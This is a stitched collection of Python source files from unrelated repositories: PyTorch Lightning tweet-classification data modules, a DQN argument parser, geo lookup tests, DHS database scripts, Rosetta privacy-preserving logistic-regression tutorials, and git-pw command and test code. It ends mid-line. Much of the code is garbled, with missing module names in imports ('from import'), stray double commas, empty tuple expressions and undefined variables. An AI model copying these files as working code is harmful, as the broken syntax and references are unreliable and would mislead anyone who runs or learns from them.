self.test_acc(y_hat.softmax(dim=-1), y) self.log('test_acc', self.test_acc, prog_bar=True, on_step=False, on_epoch=True) def configure_optimizers(self): return torch.optim.Adam(self.parameters(),, weight_decay=self.hparams.weight_decay) ```
{ "source": "00krishna-research/lightning-nlp-tweet-classification", "score": 2 }
#### File: src/datamodules/ ```python from typing import Optional, Tuple import torch from pytorch_lightning import LightningDataModule from import ConcatDataset, DataLoader, Dataset, random_split from torchvision.datasets import MNIST from torchvision.transforms import transforms import string from collections import Counter from typing import Optional import numpy as np import pandas as pd import pytorch_lightning as pl import torch import from import Dataset class DisasterTweetsDataModule(pl.LightningDataModule): def __init__(self, tweets_data_path, batch_size, num_workers=0, pin_memory=True): super().__init__() self.num_workers = num_workers self.tweets_data_path = tweets_data_path self.embeddings_path = embeddings_path self.batch_size = batch_size self.pin_memory = pin_memory def setup(self, stage: Optional[str] = None): tweets_df = pd.read_csv(self.tweets_data_path) def train_dataloader(self): return DataLoader( self.train_ds, batch_size=self.batch_size, shuffle=True, drop_last=True, pin_memory=self.pin_memory, num_workers=self.num_workers ) def val_dataloader(self): return DataLoader( self.val_ds, batch_size=self.batch_size, shuffle=False, drop_last=False, pin_memory=self.pin_memory, num_workers=self.num_workers ) def test_dataloader(self): return DataLoader( self.test_ds, batch_size=self.batch_size, shuffle=False, drop_last=False, pin_memory=self.pin_memory, num_workers=self.num_workers ) ``` #### File: src/datamodules/ ```python import collections import numpy as np import pandas as pd import re import spacy from import Field from import Field, TabularDataset, BucketIterator from typing import Optional, Tuple import torch from pytorch_lightning import LightningDataModule from import ConcatDataset, DataLoader, Dataset, random_split from torchvision.datasets import MNIST from torchvision.transforms import transforms import string from typing import Optional import pandas as pd import pytorch_lightning as pl TRAINPCT = 0.8 TESTPCT = 0.2 # Read raw data tweets = pd.read_csv("data/train.csv", header=0) # Create training/test/validation split def train_test_val_split(x, trainpct=0.8): r1, r2 = np.random.random(2) if r1 <= trainpct: res = "train" else: res = "test" if res=="train" and r2 <= trainpct: res = "train" elif res=="train" and r2 > trainpct: res = "val" else: pass return res # Preprocess the reviews def preprocess_text(text): text = ' '.join(word.lower() for word in text.split(" ")) text = re.sub(r"([.,!?])", r" \1 ", text) text = re.sub(r"[^a-zA-Z.,!?]+", r" ", text) return text tweets["split"] = 0 tweets["split"] = tweets.split.apply(train_test_val_split) tweets["text"] = tweets.text.apply(preprocess_text) # Write munged data to CSV tweets.to_csv("output.csv", index=False) spacy_en = spacy.load("en") def tokenize(text): return [tok.text for tok in spacy_en.tokenizer(text)] quote = Field(sequential=True, use_vocab=True, tokenize=tokenize, lower=True) score = Field(sequential=False, use_vocab=False) fields = {"quote": ("q", quote), "score": ("s", score)} train_data, test_data = TabularDataset.splits( path="mydata", train="train.json", test="test.json", format="json", fields=fields ) ``` #### File: src/datamodules/ ```python import torchtext import torch from torchtext.datasets import IMDB from import get_tokenizer from collections import Counter from torchtext.vocab import Vocab from import DataLoader from torch.nn.utils.rnn import pad_sequence tokenizer = get_tokenizer('basic_english') train_iter = IMDB(split='train') counter = Counter() for (label, line) in train_iter: counter.update(tokenizer(line)) vocab = Vocab(counter, min_freq=10, specials=('<unk>', '<BOS>', '<EOS>', '<PAD>')) text_transform = lambda x: [vocab['<BOS>']] + [vocab[token] for token in tokenizer(x)] + [vocab['<EOS>']] label_transform = lambda x: 1 if x == 'pos' else 0 def collate_batch(batch): label_list, text_list = [], [] for (_label, _text) in batch: label_list.append(label_transform(_label)) processed_text = torch.tensor(text_transform(_text)) text_list.append(processed_text) return torch.tensor(label_list), pad_sequence(text_list, padding_value=3.0) train_iter = IMDB(split='train') train_dataloader = DataLoader(list(train_iter), batch_size=2, shuffle=True, collate_fn=collate_batch) print(next(iter(train_dataloader))) ``` #### File: src/datamodules/ ```python import torchtext import torch from torchtext.datasets import IMDB, AG_NEWS from import get_tokenizer from collections import Counter from torchtext.vocab import Vocab, build_vocab_from_iterator from import DataLoader from torch.nn.utils.rnn import pad_sequence from torchtext.vocab import GloVe import torch.nn as nn import numpy as np tokenizer = get_tokenizer('basic_english') train_iter = AG_NEWS(split='train') def yield_tokens(data_iter): for _, text in data_iter: yield tokenizer(text) vocab = build_vocab_from_iterator(yield_tokens(train_iter), specials=["<unk>"]) vocab.set_default_index(vocab["<unk>"]) emb_dim = 100 # get pretrained glove vectors glove = GloVe(name = '6B', dim = emb_dim) # create a tensor used for holding the pre-trained vectors for each element of the vocab pretrained_embedding = torch.zeros(len(vocab), emb_dim) # get the pretrained vector's vocab, Dict[str, int] # pretrained_vocab = glove.vectors.get_stoi() pretrained_vocab = glove.stoi for idx, token in enumerate(vocab.get_itos()): if token in pretrained_vocab: pretrained_vector = glove[token] # pretrained_vector is a FloatTensor pre-trained vector for `token` pretrained_embedding[idx] = pretrained_vector # update the appropriate row in pretrained_embedding print(pretrained_embedding[1]) class SentimentLSTM(nn.Module): def __init__(self, n_vocab, n_embed, n_hidden, n_output, n_layers, drop_p = 0.8): super().__init__() self.n_vocab = n_vocab self.n_layers = n_layers self.n_hidden = n_hidden self.embedding = nn.Embedding(n_vocab, n_embed) self.lstm = nn.LSTM(n_embed, n_hidden, n_layers, batch_first = True, dropout = drop_p) self.dropout = nn.Dropout(drop_p) self.fc = nn.Linear(n_hidden, n_output) self.sigmoid = nn.Sigmoid() def forward (self, input_words): embedded_words = self.embedding(input_words) lstm_out, h = self.lstm(embedded_words) lstm_out = self.dropout(lstm_out) lstm_out = lstm_out.contiguous().view(-1, self.n_hidden) fc_out = self.fc(lstm_out) sigmoid_out = self.sigmoid(fc_out) sigmoid_out = sigmoid_out.view(batch_size, -1) sigmoid_last = sigmoid_out[:, -1] return sigmoid_last, h def init_hidden (self, batch_size): device = "cpu" weights = next(self.parameters()).data h = (, batch_size, self.n_hidden).zero_().to(device),, batch_size, self.n_hidden).zero_().to(device)) return h nb_samples = 100 features = torch.randint(0, 10000, (nb_samples, 2)) labels = torch.empty(nb_samples, dtype=torch.long).random_(10) dataset =, labels) loader = DataLoader( dataset, batch_size=2 ) def pad_text(txt, seq_length): if len(txt) >= seq_length: res = txt[:seq_length] else: res = ['']*(seq_length-len(txt)) + txt return res def convert_unknowns(list_input, unknown_index): return list(map(lambda x: unknown_index if x=="" else x, list_input)) def tpipeline(x,seq_length, unknown_index=0): res = vocab(tokenizer(x)) res = pad_text(res, seq_length) res = map(lambda x: 0 if x=="" else x, res) return list(res) def tpipeline_testing(x,seq_length, unknown_index=0): res = pad_text(x, seq_length) res = list(map(lambda x: unknown_index if x=="" else x, res)) return res text_pipeline = lambda x: vocab(tokenizer(x)) label_pipeline = lambda x: x.long() class MyCollator(object): def __init__(self, seq_length): self.seq_length = seq_length def __call__(self, batch): label_list, text_list = [], [] for (_label, _text) in batch: label_list.append(label_pipeline(_label)) processed_text = torch.tensor(tpipeline(_text, self.seq_length), dtype=torch.int64) text_list.append(processed_text) label_list = torch.tensor(label_list, dtype=torch.int64) text_list = torch.tensor(text_list, dtype=torch.float32 ) return text_list, label_list class MyOtherCollator(object): def __init__(self, seq_length, unknown_index=0): self.seq_length = seq_length self.unknown_index = unknown_index def __call__(self, batch): text, label = list(zip(*batch)) texts = list(map(lambda x: x.tolist(), text)) #texts = list(map(lambda x: vocab(tokenizer(x)), texts)) texts = list(map(lambda x: pad_text(x, self.seq_length), texts)) texts = list(map(lambda x: convert_unknowns(x, self.unknown_index), texts)) ttexts = list(map(lambda x: torch.LongTensor(x), texts)) return torch.stack(ttexts), torch.stack(label) collate_batch = MyOtherCollator(5, 0) dataloader = DataLoader(dataset, batch_size=8, shuffle=False, collate_fn=collate_batch) dl_without_collate = DataLoader(dataset, batch_size=8, shuffle=False) print(next(iter(dataloader))) print(next(iter(dl_without_collate))) ```
{ "source": "00krishna-research/lightning-rl-deep-q-learning", "score": 3 }
#### File: src/common/ ```python import argparse def add_base_args(parent) -> argparse.ArgumentParser: """ Adds arguments for DQN model Note: these params are fine tuned for Pong env Args: parent """ arg_parser = argparse.ArgumentParser(parents=[parent]) arg_parser.add_argument("--algo", type=str, default="dqn", help="algorithm to use for training") arg_parser.add_argument("--batch_size", type=int, default=32, help="size of the batches") arg_parser.add_argument("--lr", type=float, default=1e-4, help="learning rate") arg_parser.add_argument("--env", type=str, default="PongNoFrameskip-v4", help="gym environment tag") arg_parser.add_argument("--gamma", type=float, default=0.99, help="discount factor") arg_parser.add_argument("--episode_length", type=int, default=500, help="max length of an episode") arg_parser.add_argument("--max_episode_reward", type=int, default=18, help="max episode reward in the environment") arg_parser.add_argument("--max_steps", type=int, default=500000, help="max steps to train the agent") arg_parser.add_argument("--n_steps", type=int, default=4, help="how many steps to unroll for each update") arg_parser.add_argument("--gpus", type=int, default=1, help="number of gpus to use for training") arg_parser.add_argument("--seed", type=int, default=123, help="seed for training run") arg_parser.add_argument("--backend", type=str, default="dp", help="distributed backend to be used by lightning") return arg_parser ```
{ "source": "00krishna-sandbox/gdelt", "score": 3 }
#### File: gdelt/geo/ ```python import pytest from shapely.geometry import shape, Point # from geo.point_in_geojson import point_to_iraq from geo import point_to_iraq # @pytest.fixture def test_nineveh(): p = Point((42.451171875, 35.82672127366604)) properties = point_to_iraq(p) assert properties['name:en'] == 'Nineveh' # @pytest.fixture def test_al_anbar(): # "Al Anbar" p = Point((41.484375, 32.32427558887655)) properties = point_to_iraq(p) assert properties['name:en'] == 'Al Anbar' # @pytest.fixture def test_diyala(): # Diyala p = Point((45.120849609375, 33.86129311351553)) properties = point_to_iraq(p) assert properties['name:en'] == 'Diyala' ```
{ "source": "00krishna-tools/pydhs", "score": 3 }
#### File: pydhs/scripts/ ```python from pydhs.Database import DatabasePsycopg2 from pydhs.Database import DatabaseSqlalchemy from pydhs.Controller import Controller from pydhs.controller_stored_procedures import Controller_stored_procedures def main(database, tablefile): c = Controller(database) ## function to add table names to each table. c.action_add_table_name_to_each_database_table(tablefile) ## Function to convert table names to lower case c.action_set_table_names_to_lowercase() ## Function to convert column names to lower case c.action_set_field_names_to_lowercase() def main_births(database, tablefile, variablefile): c = Controller(database) c.action_add_list_of_variables_to_all_tables(tablefile, variablefile) def load_stored_procedures(database): c = Controller_stored_procedures(database) c.add_four_digit_function() c.add_wealth_v190_recode_function() if __name__ == "__main__": # execute only if run as a script main('db_dhs_global', 'tablelists/tablelist_all.csv') main_births('db_dhs_global', 'tablelists/tablelist_br.csv', 'variable_lists/added_variables_birth_table.csv') load_stored_procedures('db_dhs_global') ``` #### File: pydhs/scripts/ ```python from pydhs.Database import DatabasePsycopg2 from pydhs.Database import DatabaseSqlalchemy from pydhs.Controller import Controller def main_merge(database): c = Controller(database) c.action_merge_wealth_data_into_birth_table() c.action_merge_wealth_data_into_birth_table_egypt() c.action_merge_wealth_data_into_birth_table_philippines() c.action_merge_wealth_data_into_birth_table_indonesia() print('merge of wealth and birth data completed.') if __name__ == "__main__": main_merge('db_dhs_global') ``` #### File: pydhs/scripts/ ```python from pydhs.Database import DatabasePsycopg2 from pydhs.Database import DatabaseSqlalchemy from pydhs.Controller import Controller def main(database): c = Controller(database) c.action_standardize_fields() if __name__ == "__main__": # execute only if run as a script main('db_antonio_india') ``` #### File: pydhs/scripts/ ```python from pydhs.controller_countrydata import Controller_countrydata def main_add_country_data(database): d = Controller_countrydata(database) #d.action_add_column_iso3_to_intersection_table() #d.action_update_iso3_codes_for_country_data() d.get_country_column_names_and_add_to_intersection_table() print(d.create_query_for_merging_country_data_into_intersection_table()) d.merge_country_data_into_intersection_table() print('completed addition of country data.') if __name__ == "__main__": main_add_country_data('db_dhs_global') ```
{ "source": "00make/Rosetta-zh", "score": 2 }
#### File: tutorials/code/ ```python import re import matplotlib.pyplot as plt import os import sys import csv import tensorflow as tf import numpy as np from util import read_dataset, savecsv, loadcsv import pandas as pd import argparse pd.set_option('display.width', 1000) np.set_printoptions(suppress=True) os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' np.random.seed(0) def getids(rootdir): lists = os.listdir(rootdir) ids = [] for i in range(0, len(lists)): path = os.path.join(rootdir, lists[i]) if os.path.isdir(path): continue filename = lists[i] m = re.match(r'(tf|rtt)-(\d+|real|pred)-(W|Y|b).csv', filename) if m is None: continue if m[1] == 'tf' and m[3] == 'W': ids.append(m[2]) ids.sort() return ids def cope_diff(tf_file, rtt_file): val_tf = loadcsv(tf_file).reshape(-1, 1) val_rtt = loadcsv(rtt_file).reshape(-1, 1) val_rtt[abs(val_rtt) < 1e-5] = 1e-5 epoch_index = np.full(val_tf.shape, i) diff_div = val_tf/val_rtt diff_sub = val_tf - val_rtt diff_percent = (val_tf - val_rtt) / val_rtt cc = np.hstack((epoch_index, val_tf, val_rtt, diff_sub, diff_percent, diff_div)) return cc # ################################################## Args parser = argparse.ArgumentParser(description="Model Plot") parser.add_argument('--sname', type=str, help="script name", required=True) args, unparsed = parser.parse_known_args() # ################################################## csvprefix = "./log/" + args.sname tfdir = "./log/tf-" + args.sname rttdir = "./log/rtt-" + args.sname ids = getids(tfdir) tf_real = tfdir + '/tf-real-Y.csv' tf_pred = tfdir + '/tf-pred-Y.csv' rt_pred = rttdir + '/rtt-pred-Y.csv' tf_W = [] tf_b = [] rt_W = [] rt_b = [] for id_ in ids: tf_W.append('{}/tf-{}-W.csv'.format(tfdir, id_)) tf_b.append('{}/tf-{}-b.csv'.format(tfdir, id_)) rt_W.append('{}/rtt-{}-W.csv'.format(rttdir, id_)) rt_b.append('{}/rtt-{}-b.csv'.format(rttdir, id_)) # #### weights & biases diffs = None wdiffs = None wdiffsavg = None bdiffs = None for i in range(len(ids)): weights_diff = cope_diff(tf_W[i], rt_W[i]) biases_diff = cope_diff(tf_b[i], rt_b[i]) diff = np.vstack((weights_diff, biases_diff)) if diffs is None: diffs = diff wdiffs = weights_diff bdiffs = biases_diff wdiffsavg = np.mean(weights_diff, axis=0) else: diffs = np.vstack((diffs, diff)) wdiffs = np.vstack((wdiffs, weights_diff)) bdiffs = np.vstack((bdiffs, biases_diff)) wdiffsavg = np.vstack( (wdiffsavg, np.mean(weights_diff, axis=0))) # #### save csvprefix = "./log/" + args.sname columns = ['epoch', 'tf', 'rtt', 'tf-rtt', '(tf-rtt)/rtt', 'tf/rtt'] # print(diffs[-DIM_NUM-1:, :]) df = pd.DataFrame(diffs, columns=columns) df.to_csv(csvprefix+"-Wb.csv", index=False, float_format="%.10f") # predictions pred_diff = cope_diff(tf_pred, rt_pred) df = pd.DataFrame(pred_diff, columns=columns) df.to_csv(csvprefix+"-Y.csv", index=False, float_format="%.10f") # plot plt.title("weights tf-rtt") plt.xlabel("iterations") plt.plot(wdiffs[:, 3]) plt.savefig(csvprefix+"-W-diff.png") plt.clf() plt.title("weights (tf-rtt)/rtt") plt.xlabel("iterations") plt.plot(wdiffs[:, 4]) plt.savefig(csvprefix+"-W-diff4.png") plt.clf() plt.title("weights tf/rtt") plt.xlabel("iterations") plt.plot(wdiffs[:, 5]) plt.savefig(csvprefix+"-W-diff5.png") plt.clf() # plot plt.title("bias tf-rtt") plt.xlabel("iterations") plt.plot(bdiffs[:, 3]) plt.savefig(csvprefix+"-b-diff.png") plt.clf() plt.title("bias (tf-rtt)/rtt") plt.xlabel("iterations") plt.plot(bdiffs[:, 4]) plt.savefig(csvprefix+"-b-diff4.png") plt.clf() plt.title("bias tf/rtt") plt.xlabel("iterations") plt.plot(bdiffs[:, 5]) plt.savefig(csvprefix+"-b-diff5.png") plt.clf() # plot plt.title("predict tf-rtt") plt.xlabel("samples") plt.plot(pred_diff[:, 3]) plt.savefig(csvprefix+"-Y-diff.png") plt.clf() plt.title("predict (tf-rtt)/rtt") plt.xlabel("samples") plt.plot(pred_diff[:, 4]) plt.savefig(csvprefix+"-Y-diff4.png") plt.clf() plt.title("predict tf/rtt") plt.xlabel("samples") plt.plot(pred_diff[:, 5]) plt.savefig(csvprefix+"-Y-diff5.png") plt.clf() ``` #### File: tutorials/code/ ```python import argparse import csv import math import os import sys import time import latticex.rosetta as rtt # difference from tensorflow import numpy as np import pandas as pd import tensorflow as tf rtt.activate("SecureNN") mpc_player_id = rtt.py_protocol_handler.get_party_id() print("mpc_player_id:", mpc_player_id) np.set_printoptions(suppress=True) np.random.seed(0) EPOCHES = 1 BATCH_SIZE = 32 learning_rate = 0.03125 DIM_NUM = 11 ROW_NUM = 1279 file_x = "" file_y = "" filex_name = "cls_train_x.csv" filey_name = "cls_train_y.csv" file_x = "../dsets/P" + str(mpc_player_id) + "/" + filex_name file_y = "../dsets/P" + str(mpc_player_id) + "/" + filey_name print("file_x:", file_x) print("file_y:", file_y) print("DIM_NUM:", DIM_NUM) # training dataset dataset_x0 = rtt.PrivateTextLineDataset( file_x, data_owner=0) # P0 hold the file_x data dataset_x1 = rtt.PrivateTextLineDataset( file_x, data_owner=1) # P1 hold the file_x data dataset_y = rtt.PrivateTextLineDataset( file_y, data_owner=0) # P0 hold the file_y data # dataset decode def decode_p0(line): fields = tf.string_split([line], ',').values fields = rtt.PrivateInput(fields, data_owner=0) return fields def decode_p1(line): fields = tf.string_split([line], ',').values fields = rtt.PrivateInput(fields, data_owner=1) return fields # dataset pipeline dataset_x0 = dataset_x0 \ .map(decode_p0)\ .batch(BATCH_SIZE) dataset_x1 = dataset_x1 \ .map(decode_p1)\ .batch(BATCH_SIZE) dataset_y = dataset_y \ .map(decode_p0)\ .batch(BATCH_SIZE) # make iterator iter_x0 = dataset_x0.make_initializable_iterator() X0 = iter_x0.get_next() iter_x1 = dataset_x1.make_initializable_iterator() X1 = iter_x1.get_next() iter_y = dataset_y.make_initializable_iterator() Y = iter_y.get_next() # Join input X of P0 and P1, features splitted dataset X = tf.concat([X0, X1], axis=1) # initialize W & b W = tf.Variable(tf.zeros([DIM_NUM, 1], dtype=tf.float64)) b = tf.Variable(tf.zeros([1], dtype=tf.float64)) # build lr model pred_Y = tf.sigmoid(tf.matmul(X, W) + b) dy = pred_Y - Y dw = tf.matmul(X, dy, transpose_a=True) * (1.0 / BATCH_SIZE) db = tf.reduce_sum(dy, axis=0) * (1.0 / BATCH_SIZE) delta_w = dw * learning_rate delta_b = db * learning_rate update_w = W - delta_w update_b = b - delta_b # update variables assign_update_w = tf.assign(W, update_w) assign_update_b = tf.assign(b, update_b) # training init = tf.global_variables_initializer() with tf.Session() as sess: # init var & iter[iter_x0.initializer, iter_x1.initializer, iter_y.initializer]) # train start_time = time.time() BATCHES = int(ROW_NUM / BATCH_SIZE) for e in range(EPOCHES): for i in range(BATCHES):[assign_update_w, assign_update_b]) training_use_time = time.time()-start_time print("training_use_time: {} seconds".format(training_use_time)) print(rtt.get_perf_stats(True)) rtt.deactivate() ``` #### File: tutorials/code/ ```python from sklearn.metrics import mean_absolute_error, mean_squared_log_error, median_absolute_error from sklearn.metrics import roc_auc_score, roc_curve, precision_recall_curve, auc from sklearn.metrics import precision_score, accuracy_score, recall_score, f1_score from sklearn.metrics import mean_squared_error, explained_variance_score, r2_score import csv import pandas as pd import numpy as np import json def read_dataset(file_name=None): if file_name is None: print("Error! No file name!") return res_data = [] with open(file_name, 'r') as f: cr = csv.reader(f) for each_r in cr: curr_r = [np.array([v], dtype=np.float_)[0] for v in each_r] res_data.append(curr_r) # print(each_r) return res_data def savecsv(file_name, tf_tensor): """ only for numpy.narray """ np.savetxt(file_name, tf_tensor, fmt="%.10f", delimiter=",") def loadcsv(file_name): """ only for numpy.narray """ return np.loadtxt(file_name, delimiter=",") def pretty(d): """ d is a dict""" return json.dumps(d, indent=2, ensure_ascii=False) def score_logistic_regression(prediction_prob, target, n=0.005, ratio=True, list_metrics=['tag', 'score_auc', 'score_ks', 'threshold_opt', 'score_accuracy', 'score_precision', 'score_recall', 'score_f1'], tag=''): fpr, tpr, thresholds = roc_curve(target, prediction_prob, pos_label=1) score_auc = auc(fpr, tpr) crossfreq = pd.crosstab(prediction_prob[:, 0], target[:, 0]) crossdens = crossfreq.cumsum(axis=0) / crossfreq.sum() crossdens['gap'] = abs(crossdens[0] - crossdens[1]) score_ks = crossdens[crossdens['gap'] == crossdens['gap'].max()]['gap'].iloc[0] threshold_opt = thresholds[np.argmax(np.abs(tpr - fpr))] prediction = (prediction_prob >= threshold_opt).astype('int64') score_accuracy = accuracy_score(target, prediction) score_precision = precision_score(target, prediction) score_recall = recall_score(target, prediction) score_f1 = f1_score(target, prediction) scope = locals() dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics]) return dict_evaluation_metrix def score_linear_regression(y_pred, y_true, list_metrics=['tag', 'mse', 'rmse', 'mae', 'evs', 'r2'], tag=''): mse = mean_squared_error(y_true, y_pred) rmse = np.sqrt(mean_squared_error(y_true, y_pred)) mae = median_absolute_error(y_true, y_pred) evs = explained_variance_score(y_true, y_pred) r2 = r2_score(y_true, y_pred) scope = locals() dict_evaluation_metrix = dict([(i, eval(i, scope)) for i in list_metrics]) return dict_evaluation_metrix ```
{ "source": "00-matt/git-pw", "score": 2 }
#### File: git-pw/git_pw/ ```python import click from git_pw import bundle as bundle_cmds from git_pw import config from git_pw import logger from git_pw import patch as patch_cmds from git_pw import series as series_cmds CONF = config.CONF @click.option('--debug', default=False, is_flag=True, help="Output more information about what's going on.") @click.option('--token', metavar='TOKEN', envvar='PW_TOKEN', help="Authentication token. Defaults to the value of " "'git config pw.token'.") @click.option('--username', metavar='USERNAME', envvar='PW_USERNAME', help="Authentication username. Defaults to the value of " "'git config pw.username'.") @click.option('--password', metavar='PASSWORD', envvar='PW_PASSWORD', help="Authentication password. Defaults to the value of " "'git config pw.password'.") @click.option('--server', metavar='SERVER', envvar='PW_SERVER', help="Patchwork server address/hostname. Defaults to the value " "of 'git config pw.server'.") @click.option('--project', metavar='PROJECT', envvar='PW_PROJECT', help="Patchwork project. Defaults the value of " "'git config pw.project'.") @click.version_option() def cli(debug, token, username, password, server, project): """git-pw is a tool for integrating Git with Patchwork. git-pw can interact with individual patches, complete patch series, and customized bundles. The three major subcommands are *patch*, *bundle*, and *series*. The git-pw utility is a wrapper which makes REST calls to the Patchwork service. To use git-pw, you must set up your environment by configuring your Patchwork server URL and either an API token or a username and password. To configure the server URL, run:: git config pw.server To configure the token, run:: git config pw.token token Alternatively, you can pass these options via command line parameters or environment variables. For more information on any of the commands, simply pass ``--help`` to the appropriate command. """ logger.configure_verbosity(debug) CONF.debug = debug CONF.token = token CONF.username = username CONF.password = password CONF.server = server CONF.project = project def patch(): """Interact with patches. Patches are the central object in Patchwork structure. A patch contains both a diff and some metadata, such as the name, the description, the author, the version of the patch etc. Patchwork stores not only the patch itself but also various metadata associated with the email that the patch was parsed from, such as the message headers or the date the message itself was received. """ pass def series(): """Interact with series. Series are groups of patches, along with an optional cover letter. Series are mostly dumb containers, though they also contain some metadata themselves, such as a version (which is inherited by the patches and cover letter) and a count of the number of patches found in the series. """ pass def bundle(): """Interact with bundles. Bundles are custom, user-defined groups of patches. Bundles can be used to keep patch lists, preserving order, for future inclusion in a tree. There's no restriction of number of patches and they don't even need to be in the same project. A single patch also can be part of multiple bundles at the same time. An example of Bundle usage would be keeping track of the Patches that are ready for merge to the tree. """ pass patch.add_command(patch_cmds.apply_cmd) patch.add_command(patch_cmds.show_cmd) patch.add_command(patch_cmds.download_cmd) patch.add_command(patch_cmds.update_cmd) patch.add_command(patch_cmds.list_cmd) series.add_command(series_cmds.apply_cmd) series.add_command(series_cmds.show_cmd) series.add_command(series_cmds.download_cmd) series.add_command(series_cmds.list_cmd) bundle.add_command(bundle_cmds.apply_cmd) bundle.add_command(bundle_cmds.show_cmd) bundle.add_command(bundle_cmds.download_cmd) bundle.add_command(bundle_cmds.list_cmd) bundle.add_command(bundle_cmds.create_cmd) bundle.add_command(bundle_cmds.update_cmd) bundle.add_command(bundle_cmds.delete_cmd) bundle.add_command(bundle_cmds.add_cmd) bundle.add_command(bundle_cmds.remove_cmd) ``` #### File: git-pw/tests/ ```python import unittest from click.testing import CliRunner as CLIRunner import mock from git_pw import bundle @mock.patch('git_pw.api.detail') @mock.patch('git_pw.api.index') class GetBundleTestCase(unittest.TestCase): """Test the ``_get_bundle`` function.""" def test_get_by_id(self, mock_index, mock_detail): """Validate using a number (bundle ID).""" # not a valid return value (should be a JSON response) but good enough mock_detail.return_value = 'hello, world' result = bundle._get_bundle('123') assert result == mock_detail.return_value, result mock_index.assert_not_called() mock_detail.assert_called_once_with('bundles', '123') def test_get_by_name(self, mock_index, mock_detail): """Validate using a string (bundle name).""" # not a valid return value (should be a JSON response) but good enough mock_index.return_value = ['hello, world'] result = bundle._get_bundle('test') assert result == mock_index.return_value[0], result mock_detail.assert_not_called() mock_index.assert_called_once_with('bundles', [('q', 'test')]) def test_get_by_name_too_many_matches(self, mock_index, mock_detail): """Validate using a string that returns too many results.""" # not valid return values (should be a JSON response) but good enough mock_index.return_value = ['hello, world', 'uh oh'] with self.assertRaises(SystemExit): bundle._get_bundle('test') def test_get_by_name_too_few_matches(self, mock_index, mock_detail): """Validate using a string that returns too few (no) results.""" mock_index.return_value = [] with self.assertRaises(SystemExit): bundle._get_bundle('test') @mock.patch('git_pw.bundle._get_bundle') @mock.patch('') @mock.patch('git_pw.utils.git_am') class ApplyTestCase(unittest.TestCase): def test_apply_without_args(self, mock_git_am, mock_download, mock_get_bundle): """Validate calling with no arguments.""" rsp = {'mbox': ''} mock_get_bundle.return_value = rsp mock_download.return_value = 'test.patch' runner = CLIRunner() result = runner.invoke(bundle.apply_cmd, ['123']) assert result.exit_code == 0, result mock_get_bundle.assert_called_once_with('123') mock_download.assert_called_once_with(rsp['mbox']) mock_git_am.assert_called_once_with(mock_download.return_value, ()) def test_apply_with_args(self, mock_git_am, mock_download, mock_get_bundle): """Validate passthrough of arbitrary arguments to git-am.""" rsp = {'mbox': ''} mock_get_bundle.return_value = rsp mock_download.return_value = 'test.patch' runner = CLIRunner() result = runner.invoke(bundle.apply_cmd, ['123', '-3']) assert result.exit_code == 0, result mock_get_bundle.assert_called_once_with('123') mock_download.assert_called_once_with(rsp['mbox']) mock_git_am.assert_called_once_with(mock_download.return_value, ('-3',)) @mock.patch('git_pw.bundle._get_bundle') @mock.patch('') class DownloadTestCase(unittest.TestCase): def test_download(self, mock_download, mock_get_bundle): """Validate standard behavior.""" rsp = {'mbox': ''} mock_get_bundle.return_value = rsp mock_download.return_value = 'test.patch' runner = CLIRunner() result = runner.invoke(bundle.download_cmd, ['123']) assert result.exit_code == 0, result mock_get_bundle.assert_called_once_with('123') mock_download.assert_called_once_with(rsp['mbox'], output=None) def test_download_to_file(self, mock_download, mock_get_bundle): """Validate downloading to a file.""" rsp = {'mbox': ''} mock_get_bundle.return_value = rsp runner = CLIRunner() result = runner.invoke(bundle.download_cmd, ['123', 'test.patch']) assert result.exit_code == 0, result mock_get_bundle.assert_called_once_with('123') mock_download.assert_called_once_with(rsp['mbox'], output=mock.ANY) assert isinstance( mock_download.call_args[1]['output'], str, ) class ShowTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): # Not a complete response but good enough for our purposes rsp = { 'id': 123, 'date': '2017-01-01 00:00:00', 'web_url': '', 'name': 'Sample bundle', 'owner': { 'username': 'foo', }, 'project': { 'name': 'bar', }, 'patches': [ { 'id': 42, 'date': '2017-01-01 00:00:00', 'web_url': '', 'msgid': '<<EMAIL>>', 'list_archive_url': None, 'name': 'Test', 'mbox': '', }, ], 'public': True, } rsp.update(**kwargs) return rsp @mock.patch('git_pw.bundle._get_bundle') def test_show(self, mock_get_bundle): """Validate standard behavior.""" rsp = self._get_bundle() mock_get_bundle.return_value = rsp runner = CLIRunner() result = runner.invoke(bundle.show_cmd, ['123']) assert result.exit_code == 0, result mock_get_bundle.assert_called_once_with('123') @mock.patch('git_pw.api.version', return_value=(1, 0)) @mock.patch('git_pw.api.index') @mock.patch('git_pw.utils.echo_via_pager') class ListTestCase(unittest.TestCase): @staticmethod def _get_bundle(**kwargs): return ShowTestCase._get_bundle(**kwargs) @staticmethod def _get_users(**kwargs): rsp = { 'id': 1, 'username': 'john.doe', } rsp.update(**kwargs) return rsp def test_list(self, mock_echo, mock_index, mock_version): """Validate standard behavior.""" rsp = [self._get_bundle()] mock_index.return_value = rsp runner = CLIRunner() result = runner.invoke(bundle.list_cmd, []) assert result.exit_code == 0, result mock_index.assert_called_once_with('bundles', [ ('q', None), ('page', None), ('per_page', None), ('order', 'name')]) def test_list_with_formatting(self, mock_echo, mock_index, mock_version): """Validate behavior with formatting applied.""" rsp = [self._get_bundle()] mock_index.return_value = rsp runner = CLIRunner() result = runner.invoke(bundle.list_cmd, [ '--format', 'simple', '--column', 'ID', '--column', 'Name']) assert result.exit_code == 0, result mock_echo.assert_called_once_with(mock.ANY, ('ID', 'Name'), fmt='simple') def test_list_with_filters(self, mock_echo, mock_index, mock_version): """Validate behavior with filters applied. Apply all filters, including those for pagination. """ user_rsp = [self._get_users()] bundle_rsp = [self._get_bundle()] mock_index.side_effect = [user_rsp, bundle_rsp] runner = CLIRunner() result = runner.invoke(bundle.list_cmd, [ '--owner', 'john.doe', '--owner', '2', '--limit', 1, '--page', 1, '--sort', '-name', 'test']) assert result.exit_code == 0, result calls = ['users', [('q', 'john.doe')]),'bundles', [ ('owner', 1), ('owner', '2'), ('q', 'test'), ('page', 1), ('per_page', 1), ('order', '-name')])] mock_index.assert_has_calls(calls) @mock.patch('git_pw.api.LOG') def test_list_with_wildcard_filters(self, mock_log, mock_echo, mock_index, mock_version): """Validate behavior with a "wildcard" filter. Patchwork API v1.0 did not support multiple filters correctly. Ensure the user is warned as necessary if a filter has multiple matches. """ people_rsp = [self._get_users(), self._get_users()] bundle_rsp = [self._get_bundle()] mock_index.side_effect = [people_rsp, bundle_rsp] runner = CLIRunner() runner.invoke(bundle.list_cmd, ['--owner', 'john.doe']) assert 